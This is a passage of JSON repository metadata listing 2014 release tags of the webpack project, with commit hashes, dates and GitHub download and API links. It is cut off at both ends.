rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc0